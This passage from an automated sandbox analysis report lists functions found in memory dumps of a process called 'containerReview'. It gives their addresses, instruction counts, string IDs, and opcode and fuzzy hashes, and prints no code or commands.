                                                                    Function 00007FF849268A9F Relevance: 3.2, Strings: 2, Instructions: 736COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0?#I$P?#I
                                                                    • API String ID: 0-587548566
                                                                    • Opcode ID: 6e0ba0285b2759e9fe148221c35ad1e459b7efca206296b0a31aa0d496243b7d
                                                                    • Instruction ID: a7d602c208b40507cf1aa9bbdf646a10e5d8a4e9c89e07369805a580690883f0
                                                                    • Opcode Fuzzy Hash: 6e0ba0285b2759e9fe148221c35ad1e459b7efca206296b0a31aa0d496243b7d
                                                                    • Instruction Fuzzy Hash: D552BE3091C6A98FEB6CEF18C4A46B977B1FF58341F5041BED45AC7686CB38A981CB40
                                                                    Function 00007FF848E60D7C Relevance: .3, Instructions: 271COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 23e3f09a390b40f4a8c5302570c6e6292daf8c93675bf964fa6285e4f8b4330f
                                                                    • Instruction ID: 0dbbfdf06fc3ee5a7f56c492d128c4804bd4f3df7ce4f8586424440036ff5f9e
                                                                    • Opcode Fuzzy Hash: 23e3f09a390b40f4a8c5302570c6e6292daf8c93675bf964fa6285e4f8b4330f
                                                                    • Instruction Fuzzy Hash: 9991B375D1CA998FE789EB78C8293A97FE1FB96350F4400BAC049E72D2DB781805C711
                                                                    Function 00007FF849268828 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ MH$x9#I$x9#I
                                                                    • API String ID: 0-1480317629
                                                                    • Opcode ID: 9055fc81a4cee6d87314ecb50673e76f9e635c2a272764e33f2685b77c9e82f8
                                                                    • Instruction ID: 890073beff5b6dc531a58dd00ffe50872d575db0624a3f2b782154ccaa0cd0c4
                                                                    • Opcode Fuzzy Hash: 9055fc81a4cee6d87314ecb50673e76f9e635c2a272764e33f2685b77c9e82f8
                                                                    • Instruction Fuzzy Hash: 82515731D0C69E9FEB69EFA8D8515BDB7B1FF44341F1440BAC01AA7682CA382901CB50
                                                                    Function 00007FF848E60B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction ID: ea2171c56bb580886a4ffbd80badf8b0638c16910a09b71096214cd4efb4d34e
                                                                    • Opcode Fuzzy Hash: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction Fuzzy Hash: FA01F22A31D95A8FC7026A3EB4905D87B50EAC6136BC905BBD544CB192E2102C9EC7E0
                                                                    Function 00007FF849268E30 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0?#I$P?#I
                                                                    • API String ID: 0-587548566
                                                                    • Opcode ID: c23f5c8e0348d7d05eab37bc1286ea0e7a8c5378209b93dcf0cc835504283be5
                                                                    • Instruction ID: a85c611555c558b3c150738229b2d449ad2855bf2a2c3acfa99f372aca8d8056
                                                                    • Opcode Fuzzy Hash: c23f5c8e0348d7d05eab37bc1286ea0e7a8c5378209b93dcf0cc835504283be5
                                                                    • Instruction Fuzzy Hash: 7C511530D1C9AA8FFBB8EB2884652B9B7A1FF54341F4441FAD05EC7586DE386D808B41
                                                                    Function 00007FF84926D708 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $(fH
                                                                    • API String ID: 0-861492242
                                                                    • Opcode ID: e9bb85664b3003ec4de44cb67bea5ac3da32a01408b171f3282a91d6b1d8fdb1
                                                                    • Instruction ID: 5af5e6cdc3698c4f5159f2f95adae76a56ba6ad620a549e7f78e8a26a71378e2
                                                                    • Opcode Fuzzy Hash: e9bb85664b3003ec4de44cb67bea5ac3da32a01408b171f3282a91d6b1d8fdb1
                                                                    • Instruction Fuzzy Hash: 4B515A30D0C69E9FEB69EFA8D8546BDBBB1FF54341F1041BAC01AE7682CA346905CB51
                                                                    Function 00007FF849269AE1 Relevance: 1.7, Strings: 1, Instructions: 403COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (MH
                                                                    • API String ID: 0-2469153556
                                                                    • Opcode ID: 38e744b4adcb8fc465e203b6a994ce02a2b33bcda606a6c56a807a9c2c8e8f89
                                                                    • Instruction ID: 39e7e50bcdd258eaad4d7b9dc63bfe4bde3564f530ceda0d0ea1e43041b7f562
                                                                    • Opcode Fuzzy Hash: 38e744b4adcb8fc465e203b6a994ce02a2b33bcda606a6c56a807a9c2c8e8f89
                                                                    • Instruction Fuzzy Hash: 10D1F034A1DAA68FF378EF28D49057577E1FF44341B20497EC0AAC7A86DE29BC468741
                                                                    Function 00007FF8492665AB Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .#I
                                                                    • API String ID: 0-2821055689
                                                                    • Opcode ID: d959409b6f0ac201e068535a165d21d913a94bf98a209386ad8c29221af39bb5
                                                                    • Instruction ID: a08e69b5bf7c28601c0810f9ead390a62fc770d411f6142102efb2ee9ac90c28
                                                                    • Opcode Fuzzy Hash: d959409b6f0ac201e068535a165d21d913a94bf98a209386ad8c29221af39bb5
                                                                    • Instruction Fuzzy Hash: 4571DF30D1C59A8FFBA9EF6898556BCBBB1FF54381F1405BAC02AD3582DE296E41C740
                                                                    Function 00007FF8492659FD Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @%#I
                                                                    • API String ID: 0-897551743
                                                                    • Opcode ID: 50628f265c8097cbf04e4430991e4de4b70eb5a42c80c5e56dd348986ad3a6e3
                                                                    • Instruction ID: 2920aeb88bbe37b124b54c14829babda64144c1492af2833aa8fc939834b4d84
                                                                    • Opcode Fuzzy Hash: 50628f265c8097cbf04e4430991e4de4b70eb5a42c80c5e56dd348986ad3a6e3
                                                                    • Instruction Fuzzy Hash: 8E61E43191C4DB4FF778EE1898969B977C0FFA4352B1402B9D0AEC7996DE18AC06C781
                                                                    Function 00007FF8492637F8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 80f2a85ad6658202f44b15557f5a9c7fe886e0adc36941961a98f14b9b27ba38
                                                                    • Instruction ID: 38895284644f878775211c2e671d407ad47b8e16729bab001224c22ddceb9542
                                                                    • Opcode Fuzzy Hash: 80f2a85ad6658202f44b15557f5a9c7fe886e0adc36941961a98f14b9b27ba38
                                                                    • Instruction Fuzzy Hash: BF516B71D0C69A9FEB59EFA8C4515FEBBB1FF45341F1041BAC01AE7682DA386902CB50
                                                                    Function 00007FF849261790 Relevance: .7, Instructions: 683COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e628944b8377a22869ae0bad3be230c909dd0e490955ab8992f3f3102396ed92
                                                                    • Instruction ID: 5e863c64831078095fdde35b81d7a11947da3f176a90906162e56acb040890dc
                                                                    • Opcode Fuzzy Hash: e628944b8377a22869ae0bad3be230c909dd0e490955ab8992f3f3102396ed92
                                                                    • Instruction Fuzzy Hash: D3328330A1CA698FEBA8EF18C895E7873E2FF55341B1441B9D01ED7692DA24BC45CB81
                                                                    Function 00007FF84926ABF7 Relevance: .5, Instructions: 527COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e2433396e4135c6010f1904f8999c1ec4eec2a7d328b5c785ec66ed900e90110
                                                                    • Instruction ID: 663246edc147635422277cb7231c8d35957d12ed5ba8334b7ddb4420534d5ab6
                                                                    • Opcode Fuzzy Hash: e2433396e4135c6010f1904f8999c1ec4eec2a7d328b5c785ec66ed900e90110
                                                                    • Instruction Fuzzy Hash: C821E446E4D5F3BEF2793EA838611FC56409F507A2F5805BAD0AD869D3CC0C2CA552A6
                                                                    Function 00007FF849263A68 Relevance: .4, Instructions: 446COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f27cac7bc2bfdf13a8fba75a537eb59a719ec4e2621fc4cb09818daeee18fa9d
                                                                    • Instruction ID: 810f106383ebc8a1db1f5a94f001a8d19d21f4aac835c0e551a46acb1f3e069d
                                                                    • Opcode Fuzzy Hash: f27cac7bc2bfdf13a8fba75a537eb59a719ec4e2621fc4cb09818daeee18fa9d
                                                                    • Instruction Fuzzy Hash: 57F1AE3091C6A68FEB69EF18C4D06B577A1FF45351F5441BDC85E8B68ACB38E882CB41
                                                                    Function 00007FF84926D97F Relevance: .4, Instructions: 422COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6f19c57e757da71f4167896aed9182abd8424ac40f51fb113f076aa8b6f21258
                                                                    • Instruction ID: 8015929b744dfb182dd524fb757cad7a1cc865d271c91a18838025ceec35fb3d
                                                                    • Opcode Fuzzy Hash: 6f19c57e757da71f4167896aed9182abd8424ac40f51fb113f076aa8b6f21258
                                                                    • Instruction Fuzzy Hash: B2F1A43091C59A8FEB69EF18C8D06B477A1FF45351F5445BDC85A8B68ACA38FC81CB81
                                                                    Function 00007FF849264AB1 Relevance: .4, Instructions: 410COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d1e3f8cf2c50b0127674c50760c29c1ebe4846d574debdc4c7a1d2827ee39ba
                                                                    • Instruction ID: a0430a7eec4baa78d71e89f926d959dcc62736bfbbf72dc7845e643a1a97a829
                                                                    • Opcode Fuzzy Hash: 5d1e3f8cf2c50b0127674c50760c29c1ebe4846d574debdc4c7a1d2827ee39ba
                                                                    • Instruction Fuzzy Hash: 01D1BE30A0DEA68FE379EF28D49057577E1FF44385B24057EC4EAC3A82DA29BC468741
                                                                    Function 00007FF84926E9C1 Relevance: .4, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a64982bea5ae44e5aed2bbb5d35837b7441b3dfaaab02d1c41eb8443fd23ccf
                                                                    • Instruction ID: fb844aaef5bfb5454fc808fbc86ebbb66062bbab78468a80e6555d335eb4aaea
                                                                    • Opcode Fuzzy Hash: 5a64982bea5ae44e5aed2bbb5d35837b7441b3dfaaab02d1c41eb8443fd23ccf
                                                                    • Instruction Fuzzy Hash: 4BD1E33091CA968FE3B8EF28D49917977E1FF54341F14097EC0ABC7A82DA29BC568741
                                                                    Function 00007FF849268ABF Relevance: .3, Instructions: 335COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bc7afb3ba20dfdabb8809551d202a2072c977fe271c682ca458d73a2f7a35cf
                                                                    • Instruction ID: 370bf1d78ba7bd21b6e6a93f9b9c28ee5ffb12ab96884c92f4f90b80968c6840
                                                                    • Opcode Fuzzy Hash: 4bc7afb3ba20dfdabb8809551d202a2072c977fe271c682ca458d73a2f7a35cf
                                                                    • Instruction Fuzzy Hash: 38C1AF3051C5A68FEB2DEF18D0E05B137A1FF55341B5445BDD85B8BA8ACA38F842CB85
                                                                    Function 00007FF84926D99F Relevance: .3, Instructions: 334COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03810fa333308b613d7b9bfebb0bfa2b3e8cf313c21d77bde647a133f2bc876d
                                                                    • Instruction ID: fcd5d72b187c11fe2440e0e9a1f1e2f7f8f1d7f03ddb7a3cb1f6544f4d606425
                                                                    • Opcode Fuzzy Hash: 03810fa333308b613d7b9bfebb0bfa2b3e8cf313c21d77bde647a133f2bc876d
                                                                    • Instruction Fuzzy Hash: CBC1913051C59A8FEB2DEF18C8E06B537A1FF45351B5445BDC85B8BA8ACA38F842CB41
                                                                    Function 00007FF849263A8F Relevance: .3, Instructions: 333COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a25caa0328219d223728792346a21350cea9389cac75494ac0ad7dafcfbcdbca
                                                                    • Instruction ID: b789f39dca5a07153299ab03724c0825e0b831eb64416afe115e8c9782729357
                                                                    • Opcode Fuzzy Hash: a25caa0328219d223728792346a21350cea9389cac75494ac0ad7dafcfbcdbca
                                                                    • Instruction Fuzzy Hash: 70C1BE3051C5928FEB29EF18D0D01B637A1FF45351B5445BDD8AB8BA8ACA38F842CB80
                                                                    Function 00007FF84926D232 Relevance: .3, Instructions: 329COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce7dea4d658136c664cffff2f841a21eb7cccd02de66488e201a2225a7107cea
                                                                    • Instruction ID: 5998caead42a7eac8103cd12ab5ce7787fb5685fba97f0a4a01327ad0ca42c80
                                                                    • Opcode Fuzzy Hash: ce7dea4d658136c664cffff2f841a21eb7cccd02de66488e201a2225a7107cea
                                                                    • Instruction Fuzzy Hash: FCC1AB30A1CA9A9FE759EF28C4906B4B7A1FF48341F54417AC05EC7E86DB28BC51CB91
                                                                    Function 00007FF849265D37 Relevance: .3, Instructions: 315COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec110a6f3c050cb4789858c9bd184430759240313d2220fd04ef2e37e241226e
                                                                    • Instruction ID: 7612aa8e0ed76053920ddeca6f58adadfa07bc2105b09c28b6bee1aebdc0ac10
                                                                    • Opcode Fuzzy Hash: ec110a6f3c050cb4789858c9bd184430759240313d2220fd04ef2e37e241226e
                                                                    • Instruction Fuzzy Hash: A921D216D0DAF79EF679792D34128FC17409F733E2F1805BAD16D828D2DD0C2C459296
                                                                    Function 00007FF849260CD1 Relevance: .3, Instructions: 303COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75c5285b8f52ebee65064895b7be333f80b531fdc261dadedec636ce7e5d2b85
                                                                    • Instruction ID: 94f5c9df604ca5945be321781f8d5154fba9dd9b65960ce51033d5f27fb4825c
                                                                    • Opcode Fuzzy Hash: 75c5285b8f52ebee65064895b7be333f80b531fdc261dadedec636ce7e5d2b85
                                                                    • Instruction Fuzzy Hash: 3B213911D8D5E79FF2783EAE18211BCA690AF10392F180AB6C46D868C3DD5C3C547386
                                                                    Function 00007FF84926337A Relevance: .3, Instructions: 298COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21a33bac799bf815cb132524b82eec107dd6963e812b31b4c2cfb4e93fe64dea
                                                                    • Instruction ID: 67f5c65f65b87f0ce0600e655ef28cba76f2f1dc69530bc612c14ae35a21e2b5
                                                                    • Opcode Fuzzy Hash: 21a33bac799bf815cb132524b82eec107dd6963e812b31b4c2cfb4e93fe64dea
                                                                    • Instruction Fuzzy Hash: 29B1D23091CA868FE759EF28C0906A5BBE1FF09341F5441BDC05EC7A86CB28BC52CB95
                                                                    Function 00007FF849260D0D Relevance: .3, Instructions: 291COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61ffe704d8963a32531bc41e3f271b2705a68a78f448580c2ed19e3ceee6c6a0
                                                                    • Instruction ID: 79ff87bc57d6efa168b8285bf61dc7c1fcd9c7b239837dd4b20cd781baa131df
                                                                    • Opcode Fuzzy Hash: 61ffe704d8963a32531bc41e3f271b2705a68a78f448580c2ed19e3ceee6c6a0
                                                                    • Instruction Fuzzy Hash: 93213A21D8D5E79FF2797E6E18211BCAA90AF10792F1C0ABAC46D868C3DD5C3C547386
                                                                    Function 00007FF849267886 Relevance: .3, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40ac742ffdcdb5146bdcfac263848fdc8d9cc36857cd70ff444d7bd068a866f6
                                                                    • Instruction ID: 7f3f734c760340c6075eff0cf3ef5e778fc82a2facce3043b7aece9b14eb7f89
                                                                    • Opcode Fuzzy Hash: 40ac742ffdcdb5146bdcfac263848fdc8d9cc36857cd70ff444d7bd068a866f6
                                                                    • Instruction Fuzzy Hash: 6F81683191CB968FF378AE28A44127577E5EF95392F14057ED0AFC3982DE28BC028751
                                                                    Function 00007FF849262856 Relevance: .3, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20dca2685c14265d51db06f78cdc2f1e8e67d02a76b32700ae8ee3c9e4e760ca
                                                                    • Instruction ID: 369d15198ef97b9cd1a7a3c77fc3daf82cde3175190a171edaae876285c54c8a
                                                                    • Opcode Fuzzy Hash: 20dca2685c14265d51db06f78cdc2f1e8e67d02a76b32700ae8ee3c9e4e760ca
                                                                    • Instruction Fuzzy Hash: 2D816831D0CA968FF738AE2898551B977E0EF91392F24057ED49FC3982DE28BC028751
                                                                    Function 00007FF84926C766 Relevance: .3, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c66966200c4d88abd5e05af001c8c996cf8ea5e17137ffe3c7b8f28895aed44f
                                                                    • Instruction ID: e97701401c2fe021ff8278d2f915a8d1339ab0da46ae48c938c6a94962a18329
                                                                    • Opcode Fuzzy Hash: c66966200c4d88abd5e05af001c8c996cf8ea5e17137ffe3c7b8f28895aed44f
                                                                    • Instruction Fuzzy Hash: E381053191DA968FF739FF28940517577E0EF86392F14057ED1AEC3982DA28BC018792
                                                                    Function 00007FF8492609B9 Relevance: .2, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39ed30bb2f67be5dc16124a4a65090420276fa0c527b16bed1ef1ae082dd9517
                                                                    • Instruction ID: 4a863edc6fb15fd96f8303ee4f0f6e993f7c1535d1f664d95e6a2ac5c6a071a4
                                                                    • Opcode Fuzzy Hash: 39ed30bb2f67be5dc16124a4a65090420276fa0c527b16bed1ef1ae082dd9517
                                                                    • Instruction Fuzzy Hash: 1671363198C4D94FF778FE1988565B937C0FF883D2B1002B9D5AEC7992DE18AC0A9781
                                                                    Function 00007FF84926A8A9 Relevance: .2, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0619d05e00d22a9f812768f7decb24fae69f8d80baadfab922189df30427c9fd
                                                                    • Instruction ID: 472422bf449ccee182a001b75478401495bd4d3d03bcb98c964514317e098e5a
                                                                    • Opcode Fuzzy Hash: 0619d05e00d22a9f812768f7decb24fae69f8d80baadfab922189df30427c9fd
                                                                    • Instruction Fuzzy Hash: A5716B3190D4D9AFFB78FE1884465B537D0FF45392B2502BAD06EC7D52DE18AC2A8781
                                                                    Function 00007FF84926B46B Relevance: .2, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8aaba6930a6eb8a7275025104cbe79daff1b9c3a202bb9e1d38cf67948b88de0
                                                                    • Instruction ID: bf0acca422fffd25adc950678432e5b0250b95ac2249c75f911823fdc5acddad
                                                                    • Opcode Fuzzy Hash: 8aaba6930a6eb8a7275025104cbe79daff1b9c3a202bb9e1d38cf67948b88de0
                                                                    • Instruction Fuzzy Hash: 8B719D31D1C99E8EFB68EF6888546BCBBB0FF49381F1405BAD01ED3591DE28AC458750
